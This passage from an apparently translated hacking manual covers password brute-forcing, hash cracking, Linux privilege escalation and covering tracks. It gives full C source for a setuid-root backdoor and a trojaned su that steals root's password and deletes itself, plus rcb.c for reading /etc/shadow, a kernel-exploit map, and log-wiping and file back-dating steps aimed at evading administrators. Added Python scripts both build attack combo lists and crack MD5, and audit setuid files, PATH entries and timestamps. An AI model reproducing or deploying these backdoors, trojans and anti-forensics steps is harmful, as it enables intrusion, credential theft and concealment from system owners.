Port 22 is SSH, the usual remote shell. With a found password, log in with PuTTY (Windows) or ssh (Linux). Not every account in /etc/passwd can log in: the last field is the shell, and only accounts with a real one (/bin/bash, /bin/sh) are useful; /sbin/nologin or /bin/false means the account belongs to a service and cannot get a shell, so leave those out of the list. If port 21 (FTP) is closed, try 110 (POP3): Brutus handles POP3 exactly as it handles FTP, and people use the same password for mail as for everything else.
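Building the combo list is the step worth automating, and the shell field of /etc/passwd is the filter that keeps useless accounts out of it. The following Python script is an added example and not code from the book or from Brutus: it parses a constructed /etc/passwd excerpt, keeps only accounts with a real login shell, and produces user:password pairs in the order the chapter suggests, login-as-password first and then the word list.

```python
import io

# Constructed /etc/passwd excerpt (not from any real host).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
uri:x:1000:1000:Uri:/home/uri:/bin/bash
alex:x:1001:1001:Alex:/home/alex:/bin/sh
ftp:x:14:50:FTP User:/var/ftp:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
"""

NON_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/bin/sync"}

def parse_passwd(text):
    """Yield (login, uid, shell) for every well-formed line of a passwd file."""
    for line in io.StringIO(text):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        yield fields[0], int(fields[2]), fields[6]

def shell_accounts(text):
    """Logins that can actually get a shell (the last field is a real shell)."""
    return [login for login, _uid, shell in parse_passwd(text) if shell not in NON_LOGIN_SHELLS]

def combo_list(logins, words):
    """user:password pairs: login as password first, then every word for every login."""
    combos = ["%s:%s" % (login, login) for login in logins]
    for login in logins:
        for word in words:
            combos.append("%s:%s" % (login, word))
    return combos

if __name__ == "__main__":
    for combo in combo_list(shell_accounts(PASSWD_SAMPLE), ["123456", "qwerty"]):
        print(combo)
```

The same parser is the administrator's check in reverse: any account in the output that should not be able to log in is a finding, and the one-word list the script starts with (the login itself) is the one to test your own users against first.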
Brutus can work through a proxy: tick Use Proxy and press Define to enter the proxy address and port (fig. 0B.7); a SOCKS v5 proxy on port 1080 is the typical setting. Going through a proxy keeps the attacker's own address out of the target's logs.

[Fig. 0B.7. Brutus proxy settings: SOCKS (v5), port 1080]
BruteSSH, as the name says, brute-forces SSH. It is included in BackTrack 4, which boots with the login root and the password toor. Start the network and the graphical environment:

    /etc/init.d/networking start
    startx

The SSH server on the test machine is the target, and toor is the password to be found. BruteSSH lives in /pentest/passwords/brutessh; aa.txt is the word list (fig. 0B.8):

    ./brutessh.py -h 127.0.0.1 -u root -d aa.txt

-h is the host, -u the user name to try and -d the dictionary file.

[Fig. 0B.8. BruteSSH running against 127.0.0.1 with the user root and the dictionary aa.txt]

Medusa does the same job for many protocols, and its output (fig. 0B.9) shows each attempt (ACCOUNT CHECK: [ssh] Host: 127.0.0.1 ... Password: toor (4 of 4 complete)) and then the result, ACCOUNT FOUND. A Windows build of Medusa exists as well.

[Fig. 0B.9. Medusa checking root's password over SSH and reporting the found password toor]
0C. Cracking password hashes

Unix passwords

The tool for Unix password hashes is John The Ripper (www.openwall.com). Why crack at all? First, because on old systems the hashes are right there in /etc/passwd, and a web hole often hands that file over; second, because even where they are in /etc/shadow, a root-level hole (chapter 0D) or a readable backup copy gives them away; third, because a cracked password is worth more than a shell from an exploit: it survives reboots and patches, and it is usually reused on other hosts, sometimes as root.

JTR (John The Ripper) runs on Unix systems and on Windows; BackTrack 4 includes it.

When the passwords live in /etc/shadow, combine the two files first:

    unshadow /etc/passwd /etc/shadow > passwd.txt

The output has the /etc/passwd layout with the hashes from /etc/shadow filled in; that is the file john works on.

Useful options: john --restore continues an interrupted session; john --show passwd.txt lists the passwords already cracked, which john keeps in john.pot.
john has several cracking modes, normally tried in this order.

Single crack mode uses the information already in /etc/passwd: the login, the user's full name and home directory, with variations (the name reversed, digits appended, case changed and so on). It is fast, and it finds surprisingly many passwords, because people use their own name, their login, or something derived from them:

    john --single users.txt

where users.txt is the file produced by unshadow. In the example it recovers the passwords pincher and pitched of the test accounts.

Word list mode tries every word from a dictionary file; john ships with password.lst:

    john --wordlist=password.lst users.txt

and --rules applies the mangling rules (append digits, capitalise, reverse, and so on) to every word, which multiplies the list:

    john --rules --wordlist=password.lst users.txt

Incremental mode tries every combination of characters and is the slowest; it is where john spends days. The character set is chosen by name: alnum (letters and digits), alpha (letters only), digits, all:

    john --incremental:alnum users.txt

In the example it finds richard and luis; a plain word like titanic is found much sooner in word list mode, which is why the order of the modes matters. (--incremental alone means --incremental:all, every printable character.)

The set of accounts to attack can be restricted:

    --users=[-]LOGIN|UID[,..]     only these users (with a leading -, all except these)
    --groups=[-]GID[,..]          only users in these groups
    --shells=[-]SHELL[,..]        only users with these login shells

so that, for instance, accounts without a real shell are skipped.
Hash formats. The traditional Unix password hash is DES-based crypt(3): 13 characters, the first two of which are the salt, with the password limited to 8 characters. It was the default on Solaris (and SunOS before it) and on early Linux and FreeBSD, and anything that old is within reach of a brute-force search. FreeBSD and then Linux moved to MD5-based crypt, recognisable by the $1$ prefix (JTR calls it FreeBSD MD5); OpenBSD and recent FreeBSD use Blowfish-based crypt with the $2 prefix, which john also supports but which is slow by design. Current Linux distributions (Ubuntu, and with it BackTrack 4) use SHA-512-based crypt with the $6$ prefix; john recognises it but cracks it far more slowly than DES or MD5, so prefer the dictionary modes there. The algorithm is easy to spot: look at the characters before the second $ in the hash field.

The speed difference is large. john --test benchmarks the machine: DES is by far the fastest, MD5 crypt is orders of magnitude slower, and Blowfish and SHA-512 slower still, which is exactly why the newer formats were introduced.

Besides Unix hashes, JTR (with the jumbo patches) handles Windows LM/NTLM hashes, MySQL, MS SQL and Oracle password hashes and about 40 other formats. How long does cracking take? A dictionary word falls in minutes whatever its length; a random 8-character password under DES takes days to weeks on one machine; a random password of 15 to 20 characters is out of reach of brute force, and the only hope there is a dictionary or a password reused elsewhere. Modern Linux installations, with SHA-512 and passwords of several words, are effectively uncrackable by incremental mode; the attack then shifts to the dictionary and to the weakest accounts on the system.

LDAP passwords

If the site authenticates against an LDAP directory, root on the host does not give you hashes in /etc/passwd or /etc/shadow: they are in the LDAP database, and the LDAP server's backup or export file is where to look. In LDIF exports the password hashes are stored base64-encoded. The ldap2pw script posted to the john-users list (http://www.openwall.com/lists/john-users/2008/02/12/1) converts such an export into the passwd-like format that John The Ripper reads.
MD5 hashes

Web applications (forums, CMS) store passwords as MD5 hashes most of the time, and that is what an SQL injection delivers. On Windows a convenient cracker is MD5Inside from InsidePro (fig. 0C.1): load the hashes, pick an attack (dictionary, mask, brute force) and wait. Several hashes are cracked in one run, and the program keeps the results. The same company's PasswordsPro handles many more hash types and is the better choice when the hash is not plain MD5.

[Fig. 0C.1. MD5Inside with a list of MD5 hashes and candidate passwords such as Test_A, Test_AB, Test_ABC, 1, 12, 123, 1234, a, ab, abc, abcd]

Cracking speed depends on the hardware. MDCrack (http://mdcrack.openwall.net) is among the fastest CPU crackers and supports a couple of dozen hash types. Graphics cards are faster still (CUDA): BarsWF (http://3.14.by/ru/md5, English at http://3.14.by/en/md5), the "World Fastest MD5 Cracker", runs on the CPU cores and the GPU at the same time, and on a GeForce GT220 together with the CPU reaches about 180 million hashes per second in the example (fig. 0C.2).

[Fig. 0C.2. BarsWF cracking the hash 1b0e9fd3086d9a159a1d6cb86f11b4ca: CPU0 21.89 MHash/sec, CPU1 14.71 MHash/sec, GPU 154.28 MHash/sec, total 183.79 MHash/sec, progress 32.84 %, estimated time 0 days 0 hours 26 min 24 sec]

BarsWF is run from the command line; the hash is given with -h and the character set with -c:

    barswf_cuda_x32 -h 1b0e9fd3086d9a159a1d6cb86f11b4ca -c ~

where ~ selects the symbol characters (0, a and A add digits, lowercase and uppercase letters). Before brute-forcing a hash, look it up: online databases such as http://hash.insidepro.com/ already know the hashes of common passwords and answer instantly.
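The two sections above (Unix crypt hashes for John The Ripper, raw MD5 for the GPU crackers) share the same first step, recognising what kind of hash you hold, and the same attack order, dictionary with rules before brute force. The following Python script is an added example and not code from the book or from any of the tools named: identify_hash() names a hash from the crypt(3) prefix conventions and the length, crack_md5() runs a dictionary attack on raw MD5 with a handful of john --rules style mangling rules, and brute_md5() is the incremental mode, restricted to short strings. The hashes and the word list are constructed; the mangling rules are this example's own small set.

```python
import hashlib
import itertools
import string

def identify_hash(h):
    """Name the password hash format from its prefix (crypt(3) conventions) or length."""
    if h.startswith("$1$"):
        return "md5crypt"
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if h.startswith("$5$"):
        return "sha256crypt"
    if h.startswith("$6$"):
        return "sha512crypt"
    if len(h) == 13 and all(c in string.ascii_letters + string.digits + "./" for c in h):
        return "descrypt"
    if len(h) == 32 and all(c in string.hexdigits for c in h):
        return "raw-md5"
    return "unknown"

def mangle(word):
    """A few john --rules style variations of a dictionary word."""
    for form in (word, word.capitalize(), word.upper(), word[::-1]):
        yield form
    for form in (word, word.capitalize()):
        for digits in ("1", "123", "2008"):
            yield form + digits
    yield word.replace("a", "@").replace("e", "3").replace("o", "0")

def crack_md5(targets, wordlist, use_rules=True):
    """Dictionary attack on raw MD5 hashes; returns {hash: password} for the ones found."""
    wanted = {h.lower() for h in targets}
    found = {}
    for word in wordlist:
        candidates = mangle(word) if use_rules else (word,)
        for candidate in candidates:
            digest = hashlib.md5(candidate.encode()).hexdigest()
            if digest in wanted and digest not in found:
                found[digest] = candidate
                if len(found) == len(wanted):
                    return found
    return found

def brute_md5(target, alphabet, max_len):
    """Incremental mode: every string over alphabet up to max_len (only viable when short)."""
    target = target.lower()
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if hashlib.md5(candidate.encode()).hexdigest() == target:
                return candidate
    return None

# Constructed targets: MD5 of 123456, of Titanic2008 and of a three-digit PIN.
TARGETS = [
    "e10adc3949ba59abbe56e057f20f883e",
    hashlib.md5(b"Titanic2008").hexdigest(),
    hashlib.md5(b"417").hexdigest(),
]
WORDLIST = ["password", "123456", "titanic", "qwerty"]

if __name__ == "__main__":
    for h in TARGETS:
        print(h, identify_hash(h))
    print(crack_md5(TARGETS[:2], WORDLIST))
    print(brute_md5(TARGETS[2], string.digits, 3))
```

Titanic2008 is not in the word list, but titanic is, and the capitalise-and-append-year rule reaches it; that is the whole argument for running rules before incremental mode. Raw MD5 is unsalted, which is why the same precomputed table (rainbow table) or online database works against every site that uses it.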
Rainbow tables are precomputed hash tables: instead of computing MD5 for every candidate, the cracker looks the hash up in a table computed once, trading disk space for time. For unsalted hashes such as raw MD5 this is much faster than brute force, and tables for the common character sets can be downloaded.

Brute-forcing root locally. Suppose you have a shell as nobody and want root. An SSH login as root is usually disabled, but su is not, and su can be tried in a loop. The expect tool scripts interactive programs: an expect script, say bruteforce.exp, feeds su one candidate password after another from a word list and watches for the prompt that means success. It is slow (su deliberately pauses after a failed attempt), so run it in the background (with &) and go on with something else; and remember that every failed su is logged, so an administrator who reads the logs will see the attempt.
0D. Privilege escalation on *nix

The shell obtained through a web hole belongs to the web server's user, not to root. Getting from there to root is privilege escalation (also called privilege elevation): using a local hole to gain rights the account was not given. The commonest route on Linux is a bug in the kernel, because the kernel version is easy to learn (uname -r) and exploits for known bugs are public; distributions (Ubuntu, Fedora, Red Hat) patch them, but a server is only as current as its last update.

Where to find the exploits. exploit-db.com is the current archive; it inherited the collection of milw0rm, which closed in 2009. Damn Vulnerable Linux carries a copy of the milw0rm archive from 2007 in /pentest/exploits/milw0rm, sorted by platform (platforms), type (local or remote) and port (ports); exploit-db.com uses the same layout.

The exercise on DVL: become nobody (su nobody, fig. 0D.1), go to /tmp (cd /tmp) and check the kernel with uname -a; it is Linux 2.6.20. Search Google for linux kernel 2.6 local root exploit, or exploit-db.com for Linux kernel 2.6 Local Privilege Escalation, and read the candidates: each exploit states the kernel versions it works on, and the one for 2.6.20 is the vmsplice exploit by qaaz (2008), which covers 2.6.17 to 2.6.24.1.

Compile it (a C compiler must be available on the target):

    gcc -static -Wall -o ex ex.c

-static links the libraries in, so the binary also works when moved to a machine with a different libc; -o ex names the output. Warnings from the compiler are harmless; errors mean the source was mangled (line wrapping when copying it is the usual cause). Then run it:

    ./ex

and the prompt changes from $ to #. id confirms root (uid=0). Done: the web server account has become root.

[Fig. 0D.1. The vmsplice exploit by qaaz on DVL: su nobody; cd /tmp; uname -a reports Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:09 GMT 2007 i686 GNU/Linux; gcc -static -Wall -o ex ex.c; ./ex prints its mmap and page messages and "[+] root"; id shows uid=0(root) gid=0(root) groups=98(nobody),99(nogroup)]
A short map of Linux kernel versions and the local exploits known for them:

    2.4.17              newlocal, kmod, uselib24
    2.4.18              brk, brk2, newlocal, kmod
    2.4.19              brk, brk2, newlocal, kmod
    2.4.20              ptrace, kmod, ptrace-kmod, brk, brk2
    2.4.21              brk, brk2, ptrace, ptrace-kmod
    2.4.22              brk, brk2, ptrace, ptrace-kmod
    2.4.22-10           loginx
    2.4.23              mremap_pte
    2.4.24              mremap_pte, uselib24
    2.4.25-1            uselib24
    2.4.27              uselib24
    2.6.2               mremap_pte, krad, h00lyshit
    2.6.5-2.6.8         krad, krad2, h00lyshit
    2.6.8-5             krad2, h00lyshit
    2.6.9               krad, krad2, h00lyshit
    2.6.9-34            r00t, h00lyshit
    2.6.10              krad, krad2, h00lyshit
    2.6.13-2.6.16       raptor, raptor2, h00lyshit, prctl
    2.6.17-2.6.24.1     vmsplice
    2.6-2.6.19 (32bit)  ip_append_data() 0x82 (CVE-2009-2698)
    2.6.30+             /SELinux/RHEL5 Test Kernel Local Root Exploit 0day
    2.6.31              perf_counter (x64)
    2.6.1-2.6.32-rc5    pipe.c
Keeping root. A kernel exploit is a one-off: it may crash the machine, the kernel will be patched eventually, and re-running it each time is noisy. Having got root once, the attacker leaves himself a quieter way back; an SSH login as root, by contrast, is logged and stands out. A setuid binary owned by root is such a door. With root in hand, create it and mark it setuid, from the exploit itself or by hand:

    system("chmod 4755 /tmp/hack");

hack is a tiny C program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        char cmd[256];
        FILE *file;

        setuid(0);
        setgid(0);
        /* the command to run as root is read from /tmp/cmd */
        file = fopen("/tmp/cmd", "r");
        if (file == NULL)
            return 1;
        if (fgets(cmd, sizeof cmd, file) != NULL)
            system(cmd);
        fclose(file);
        return 0;
    }

Because /tmp/hack is setuid root, whoever runs it runs the command in /tmp/cmd as root; so the attacker later logs in as nobody, writes a command to /tmp/cmd (for instance one that starts his own shell, /tmp/evil), and runs /tmp/hack. Why a file of commands rather than a shell built into hack? Because a setuid shell is what the old exploits (do_brk and its kind) already give you, and a command file is more flexible: write

    iptables -t nat -nvL

to /tmp/cmd, run hack, and the firewall configuration is listed (or changed) without ever being root interactively. The same works through the web hole: a PHP script with system() access writes /tmp/cmd and runs /tmp/hack, and the web server is effectively root.

If there is no local exploit at all (a patched kernel and no 0-day), there is still the administrator. Plant a script that root is going to run anyway, with a line such as

    #!/bin/sh
    alias /bin/sh "chmod 4755 /tmp/evil"

and the next time root runs it, /tmp/evil becomes setuid root. This is the way on a system like BackTrack (kernel 2.6.30) where no public exploit applies.
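A setuid root file in /tmp and a world-writable directory without the sticky bit (the find command earlier in the chapter) are the two things an administrator's nightly check should turn up, and they are the two things the attacker relies on. The following Python script is an added example and not code from the book: audit_tree() walks a directory tree and reports setuid and setgid files and world-writable directories, and build_sample_tree() constructs a temporary tree containing the /tmp/hack from the text so that the audit has something to find.

```python
import os
import stat
import tempfile

def audit_tree(root):
    """Walk root and report setuid files, setgid files and world-writable directories."""
    suid_files, sgid_files, writable_dirs = [], [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        st = os.lstat(dirpath)
        # drwxrwxrwx without the sticky bit: anyone can drop or replace files here
        if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            writable_dirs.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                suid_files.append(path)
            if st.st_mode & stat.S_ISGID:
                sgid_files.append(path)
    return suid_files, sgid_files, writable_dirs

def build_sample_tree():
    """Constructed tree: one setuid binary in an open /tmp-like directory, one plain file."""
    base = tempfile.mkdtemp(prefix="audit-")
    tmp = os.path.join(base, "tmp")
    os.mkdir(tmp)
    os.chmod(tmp, 0o777)                    # world-writable, no sticky bit
    home = os.path.join(base, "home")
    os.mkdir(home)
    os.chmod(home, 0o755)
    hack = os.path.join(tmp, "hack")
    with open(hack, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(hack, 0o4755)                  # the /tmp/hack from the text
    plain = os.path.join(home, "notes.txt")
    with open(plain, "w") as f:
        f.write("nothing\n")
    os.chmod(plain, 0o644)
    return base

if __name__ == "__main__":
    suid, sgid, wdirs = audit_tree(build_sample_tree())
    print("setuid:", suid)
    print("setgid:", sgid)
    print("world-writable dirs:", wdirs)
```

On a real system the list of setuid files is short and stable (su, passwd, ping and a handful of others), so the useful check is a diff against yesterday's list rather than the list itself; a new entry, especially under /tmp or a home directory, is the backdoor described above.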
Trojaned su

What if there is no exploit and root never runs your script? Then wait for root to come to you. Administrators log in as an ordinary user and switch to root with su (switch user), typing the root password; a fake su in the user's path records it. The program has to sit where the shell finds it before /bin/su. Create a hidden directory in the user's home:

    mkdir .elm

(.elm, .ssh, or any name that looks as if it belongs there) and put it at the front of the PATH in the user's .bashrc:

    PATH=$HOME/.elm:$PATH

From then on, su typed in that user's shell runs ~/.elm/su instead of /bin/su. The fake su is an old trick; su.c by FA-Q from 1999 is at http://www.packetstormsecurity.org/trojans/index7.html and does the job:

    /*
     * su.c: fake su that records the password and removes itself
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define SU_PASS "/tmp/.rewt"

    int main(int argc, char *argv[])
    {
        char *key;
        char buf[1024];
        FILE *fd;

        key = (char *)getpass("Password:");          /* prompt exactly like su */
        fd = fopen(SU_PASS, "w");                     /* store the typed password */
        if (fd != NULL) {
            fprintf(fd, "pass: %s\n", key);
            fclose(fd);
        }
        printf("su: incorrect password\n");           /* pretend the password was wrong */
        snprintf(buf, sizeof buf, "rm %s", argv[0]);  /* and delete this fake su */
        system(buf);
        exit(1);
    }

Compile it into the hidden directory:

    cc -o ~/.elm/su su.c

How it works: the fake su asks for the password like the real one, writes it to /tmp/.rewt, prints su: incorrect password, and deletes itself. The administrator assumes a typo, types su again, gets the real /bin/su this time (the fake one is gone), logs in, and suspects nothing; the attacker reads /tmp/.rewt. Fig. 0D.2 shows it from the user's side.

[Fig. 0D.2. The fake su in action: cc -o ~/.elm/su su.c; ls -la .elm shows su; echo $PATH starts with /home/uri/.elm; su answers "su: incorrect password"; cat /tmp/.rewt shows "pass: toor"; the second su reports "bash: /home/uri/.elm/su: No such file or directory"; which su now gives /bin/su, and /bin/su logs in as root]

The user here is uri (home directory /home/uri) and the trojan lived in /home/uri/.elm, ahead of /bin in the PATH. bash had already hashed the location of su, which is why the second call reports the missing file rather than silently finding /bin/su; once the hash entry is dropped, which su returns /bin/su again and everything is back to normal. The only traces are the altered .bashrc and the /tmp/.rewt file, both of which the attacker removes.

The trojan is known to antivirus vendors: http://www.spywaredb.com/remove-su-trojan-ribbed/ describes it as "Su trojan ribbed", detected by Spyware Doctor, with the source distributed as su.c.txt. The description is accurate except for one point: the .txt file is only the source; the danger is the compiled su, and it is the PATH entry that makes it run. A scanner that looks for su.c.txt in /tmp will not notice a compiled copy under another name in a home directory.
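The fake su works only because of the PATH entry, so the check that catches it is a check of the PATH rather than of /tmp. The following Python script is an added example and not code from the book: audit_path() reports PATH entries that an unprivileged user controls (relative entries, directories under the user's home, world-writable directories), resolve() shows which file the shell would actually run for a command, and shadowed_commands() lists commands for which an earlier PATH entry hides a later one, exactly the ~/.elm/su over /bin/su situation. build_sample() constructs that layout in a temporary directory; the paths and the "bin" directory are this example's own stand-ins.

```python
import os
import stat
import tempfile

def audit_path(path_value, home):
    """Report PATH entries that let an unprivileged user plant a fake command."""
    findings = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "relative: the current directory is searched"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative path"))
            continue
        if entry == home or entry.startswith(home.rstrip("/") + "/"):
            findings.append((entry, "inside the user's home directory"))
        try:
            st = os.stat(entry)
        except OSError:
            findings.append((entry, "does not exist"))
            continue
        if st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable directory"))
    return findings

def resolve(command, path_value):
    """Which file the shell would execute for command, searching PATH left to right."""
    for entry in path_value.split(os.pathsep):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def shadowed_commands(path_value, names):
    """Commands whose first hit in PATH hides other copies further down."""
    result = {}
    for name in names:
        first = resolve(name, path_value)
        hits = [os.path.join(e, name) for e in path_value.split(os.pathsep)
                if e and os.path.isfile(os.path.join(e, name))]
        if first is not None and len(hits) > 1:
            result[name] = (first, hits[1:])
    return result

def build_sample():
    """Constructed layout: a home with .elm/su in front of a 'bin' holding the real su."""
    base = tempfile.mkdtemp(prefix="path-")
    home = os.path.join(base, "home", "uri")
    elm = os.path.join(home, ".elm")
    bin_dir = os.path.join(base, "bin")
    os.makedirs(elm)
    os.makedirs(bin_dir)
    for directory in (elm, bin_dir):
        su = os.path.join(directory, "su")
        with open(su, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(su, 0o755)
    path_value = os.pathsep.join([elm, "/usr/local/sbin", bin_dir])
    return home, path_value, bin_dir

if __name__ == "__main__":
    home, path_value, bin_dir = build_sample()
    print(audit_path(path_value, home))
    print("su resolves to:", resolve("su", path_value))
    print(shadowed_commands(path_value, ["su"]))
```

The rule the audit encodes is the one the chapter's trick violates: nothing in PATH should be writable by the user whose shell reads it, and system commands should come first. Putting $HOME/bin at the end of PATH rather than the front closes this particular door without losing the convenience.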
Reading /etc/shadow through a setuid program

Are there ways to read /etc/shadow without being root? Old ones. On systems with libc 5.4.7 (Linux of 1996) the resolver library read the file named in the environment variable RESOLV_HOST_CONF and echoed its lines in error messages, and it did so inside setuid programs that use the resolver: ping, traceroute, rlogin, ssh. Hence:

1. Start bash, if the shell is not bash already.
2. Point the resolver at the file:

       export RESOLV_HOST_CONF=/etc/shadow

3. Run a setuid program that resolves a name, with a host name that does not exist (asdf):

       ping asdf

The error output contains the lines of /etc/shadow, i.e. the password hashes, root's included. This does not work on DVL or on any current system: the libc bug was fixed long ago, and setuid programs have ignored RESOLV_HOST_CONF ever since. It is here as the pattern: a setuid program that reads a file named in its environment and echoes part of it. rcb.c automated it:

    /* RCB Phraser - therapy in '96
     * Limits: Linux only, no binary files.
     * little personal message to the world: F*CK CENSORSHIP!
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* make the setuid ping read the file and write its error output to "phrasing" */
    void getjunk(const char *filetocat)
    {
        setenv("RESOLV_HOST_CONF", filetocat, 1);
        system("ping xy 1> /dev/null 2> phrasing");
        unsetenv("RESOLV_HOST_CONF");
    }

    int main(int argc, char **argv)
    {
        char buffer[200];
        char *gag;
        FILE *devel;

        if (argc < 2) {
            fprintf(stderr, "usage: %s file\n", argv[0]);
            return 1;
        }
        getjunk(argv[1]);
        gag = buffer;
        gag += 10;                             /* skip the resolver's prefix on each line */
        devel = fopen("phrasing", "rb");
        if (devel == NULL)
            return 1;
        while (!feof(devel)) {
            if (fgets(buffer, sizeof(buffer), devel) == NULL)
                break;
            if (strlen(buffer) > 24) {
                strcpy(buffer + strlen(buffer) - 24, "\n");   /* drop the resolver's suffix */
                fputs(gag, stdout);
            }
        }
        fclose(devel);
        remove("phrasing");
        return 0;
    }

Then

    rcb /etc/shadow

prints the file, and any other file readable only by root can be substituted for /etc/shadow.

A related bug from 2004 (Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit, by Marco Ivaldi, http://www.exploit-db.com/exploits/718/) let an ordinary user change the group of files such as /etc/passwd on kernels before 2.6.7, with the same result.
0E. Covering tracks

So you have root. What now? Before anything else, the traces of how you got there must go, because the system records logins and the administrator reads the records (log files are the first thing a competent administrator looks at, and a hacked server's logs are read with special care). The login greeting itself tells the story:

    last login from xxx.com time:0:00 date:xx/xx/xx

The host or IP address the attacker came from is what gives him away. A partial fix is to log in again immediately from the machine itself,

    ssh localhost

so that the greeting now reads last login from localhost and the earlier entry is pushed down the list; but the earlier record is still there.

The proper tool is a log wiper (log cleaner). It removes only the entries that concern the attacker, so that the logs remain plausible; deleting a log wholesale is itself a sign of an intrusion, and so is a gap in it. The wiper must run as root, because the logs are writable only by root, which is why this step comes after privilege escalation.

The Apache logs matter as much as the system ones: every request, including the injection strings, is in /usr/local/apache/logs/access_log (fig. 0E.1).

[Fig. 0E.1. Apache access_log: requests from 127.0.0.1 on 15/Jun/2010, among them a GET of index.php?page=../../../../../etc/passwd]
The system logs to clean are the binary login records utmp (who is logged in now), wtmp (login history, read by last) and lastlog (last login per user), and the text logs messages, secure, xferlog (FTP transfers) and maillog, all under /var/log.

On DVL the tool is vanish2 (fig. 0E.2): it removes the attacker's host and user from the text logs, rewrites utmp, wtmp and lastlog without the corresponding records, and says "outta here" when done. Run it at the very end of the session, just before exit, because anything done afterwards is logged again.

[Fig. 0E.2. vanish2 on DVL cleaning utmp, wtmp, lastlog and the text logs and printing "outta here"]
The next thing an administrator looks at is file dates. A file whose modification time is last night, when the administrator changed nothing, stands out; every file the attacker created or edited therefore gets a plausible date. touch -t sets it; for a file to appear modified on 27 June 2009 at 23:35:22,

    touch -t 200906272335.22 file

(the format is [[CC]YY]MMDDhhmm[.ss]). Do the same for every file you touched, the fake su and the backdoor included, and for the directories they live in: a directory's modification time changes when a file is created in it.
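touch -t rewrites the access and modification times, and nothing else. The following Python script is an added example and not code from the book: parse_touch_t() reads the [[CC]YY]MMDDhhmm[.ss] format, touch_t() applies it with os.utime() the way touch does, and timestamp_inconsistency() shows the trace that remains, because the kernel sets the inode change time (ctime) to the current time on every utime() call and no unprivileged program can set it back. demo() creates a temporary file and back-dates it to the chapter's example.

```python
import os
import tempfile
from datetime import datetime

def parse_touch_t(stamp):
    """Parse touch -t's [[CC]YY]MMDDhhmm[.ss] into a POSIX timestamp (local time)."""
    main, _, seconds = stamp.partition(".")
    seconds = int(seconds) if seconds else 0
    if len(main) == 12:                      # CCYYMMDDhhmm
        fmt = "%Y%m%d%H%M"
    elif len(main) == 10:                    # YYMMDDhhmm
        fmt = "%y%m%d%H%M"
    elif len(main) == 8:                     # MMDDhhmm: current year
        main = "%d%s" % (datetime.now().year, main)
        fmt = "%Y%m%d%H%M"
    else:
        raise ValueError("bad touch -t stamp: %s" % stamp)
    when = datetime.strptime(main, fmt).replace(second=seconds)
    return when.timestamp()

def touch_t(stamp, path):
    """touch -t: set both access and modification time of path; returns the timestamp."""
    ts = parse_touch_t(stamp)
    os.utime(path, (ts, ts))
    return ts

def mtime_string(path):
    """Modification time of path as touch -t would print it back, local time."""
    return datetime.fromtimestamp(os.stat(path).st_mtime).strftime("%Y-%m-%d %H:%M:%S")

def timestamp_inconsistency(path):
    """Seconds by which the inode change time (ctime) is newer than the modification time.
    utime() rewrites atime and mtime, but the kernel sets ctime to 'now', so a back-dated
    file shows ctime far ahead of mtime: the trace that touch -t cannot remove."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime

def demo():
    """Create a temporary file, back-date it to the chapter's example and measure the gap."""
    fd, path = tempfile.mkstemp(prefix="backdated-")
    os.close(fd)
    touch_t("200906272335.22", path)
    return path, mtime_string(path), timestamp_inconsistency(path)

if __name__ == "__main__":
    path, shown, gap = demo()
    print(path, "mtime:", shown, "ctime is ahead by %.0f seconds" % gap)
```

From the administrator's side this is the counter-check: ls -l shows mtime, ls -lc shows ctime, and a file whose ctime is years after its mtime has been back-dated. find / -newerct "1 day ago" (or find with -ctime) lists what changed on disk regardless of the dates the files carry.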
10. Noticing an intruder

The administrator's side of the same story. A compromised machine shows itself in small things, and a list of checks to run regularly costs nothing:

- Who is logged in (w or who) and who has been (last). A login from an unexpected host, or at an unexpected hour, is the first sign; with last, the entries of a user who never works at night are easy to spot.
- Information leaks: finger, and more generally the readability of /etc/passwd and /etc/shadow. /etc/shadow must be readable by root alone; if it is not, or if it can be fetched over FTP, change every password on the machine.
- Sessions. PuTTY can record a whole session (Session, Logging, Printable output, to putty.log or any other name); keep such logs when administering remotely, and read them after an incident.
- Backup copies of /etc/shadow. A copy such as /etc/shadow.old, or a world-readable backup directory, hands the hashes to anyone. An LDAP server keeps its own copy (for OpenLDAP, /usr/local/openldap/backup or wherever the backups go), where the hashes are base64-encoded and a short Perl script converts them for John The Ripper. Check the permissions of every such copy.
- .bash_history of root and of every user: commands you did not type, a history that has suddenly become short, or one that was unset. A grep of the histories for words such as hack, hacking, hacker and intruder catches the careless, and a script like check_intruder.sh can run it from cron.
- /etc/hosts and .ssh/known_hosts: new entries mean the machine has been used to reach somewhere else.
- Root's own outgoing connections: a root who normally never runs

      ssh root@other-host.net

  and now does, is a compromised root.

An entry in any of these that you cannot explain is worth a full check (fig. 10.1).
11. How web servers get hacked: a summary

The hole is almost always in the web application, not in the server: SQL injection and XSS in the site's own scripts, or in a CMS or forum installed on it. An unpatched CMS is the commonest case, because its holes are published and its version is visible.

The attacker's path through a site:

